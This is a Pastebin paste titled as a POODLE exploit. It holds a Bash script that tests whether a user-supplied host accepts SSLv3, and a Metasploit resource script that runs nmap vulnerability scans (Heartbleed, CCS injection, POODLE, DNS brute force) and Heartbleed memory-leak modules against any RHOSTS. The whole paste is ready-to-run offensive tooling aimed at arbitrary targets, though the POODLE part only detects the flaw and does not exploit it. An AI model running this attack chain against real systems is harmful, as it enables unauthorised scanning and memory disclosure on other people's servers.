API tools faq
paste
Advertisement
r00t-3xp10it

poodle exploit [under-develop]

r00t-3xp10it
Sep 23rd, 2015
225
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.13 KB | None | 0 0
raw download clone embed print report
  1. # poodle exploit
  2.  
  3. #!/bin/bash
  4. # connect to ssl
  5.  
  6.  
  7.  
  8. timeout_bin=`which timeout 2>/dev/null`
  9. echo -e "[*] Input Target RHOST - example: 192.44.100.86"
  10. echo -n "[>]:"
  11. read _target
  12.  
  13.  
  14.  
  15. echo ""
  16. echo -n "[*] $_target:443 - "
  17. out="`echo 'Q' | ${timeout_bin:+$timeout_bin 5} openssl s_client -ssl3 -connect $_target:443 2>/dev/null`"
  18.  
  19.  
  20. if [ $? -eq 124 ]; then
  21.   echo "error: Timeout connecting to host!"
  22.   exit 1
  23. fi
  24.  
  25. if ! echo "$out" | grep -q 'Cipher is' ; then
  26.   echo 'Not vulnerable.  Failed to establish SSL connection.'
  27.   exit 0
  28. fi
  29.  
  30.  
  31. proto=`echo "$out" | grep '^ *Protocol *:' | awk '{ print $3 }'`
  32. cipher=`echo "$out" | grep '^ *Cipher *:' | awk '{ print $3 }'`
  33.  
  34. if [ "$cipher" = '0000'  -o  "$cipher" = '(NONE)' ]; then
  35.   echo 'Not vulnerable.  Failed to establish SSLv3 connection.'
  36.   exit 0
  37.  
  38. else
  39.  
  40.   echo "Vulnerable!  SSLv3 connection established using: $proto/$cipher"
  41.   exit 1
  42. fi
  43.  
  44.  
  45.  
  46.  
  47.  
  48.  
  49. #--------------------------->
  50.  
  51.  
  52.  
  53. <ruby>
  54. print_line("")
  55. print_good("please Wait, updating [ NSE ] database...")
  56. run_single("nmap --script-updatedb")
  57. print_line("")
  58. print_status("Please wait, checking if RHOSTS is set globally...")
  59. if (framework.datastore['RHOSTS'] == nil)
  60. print_error("[ERROR] Please set RHOSTS globally: setg RHOSTS xxx.xxx.xxx.xxx")
  61. return
  62. end
  63.  
  64. #Using nmap to populate metasploit database
  65. print_good("RHOSTS set globally [ OK ], running scans...")
  66. run_single("nmap -n -sS -Pn -oN LiLiP4tH --script ssl-ccs-injection.nse,ssl-heartbleed.nse --script-args vulns.showall -p 443 #{framework.datastore['RHOSTS']}")
  67. run_single("nmap -T4 -sV -Pn -oN Lt0P4tH --script ssl-poodle.nse,ssl-cert.nse,ssl-enum-ciphers.nse,dns-brute.nse,ip-geolocation-geoplugin.nse -p 443 #{framework.datastore['RHOSTS']}")
  68. print_line("")
  69. print_good("Please wait, running msf auxiliary modules...")
  70. </ruby>
  71.  
  72. use auxiliary/scanner/http/ssl_version
  73. run
  74. use auxiliary/scanner/http/ssl
  75. run
  76. use auxiliary/scanner/ssl/openssl_heartbleed
  77. run
  78. use auxiliary/server/openssl_heartbeat_client_memory
  79.  
  80. #Running poodle connect exploit
  81. <ruby>
  82. print_line("")
  83. print_good("trying to connect to openssl...")
  84. run_single("/tmp/poodle.sh")
  85. </ruby>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!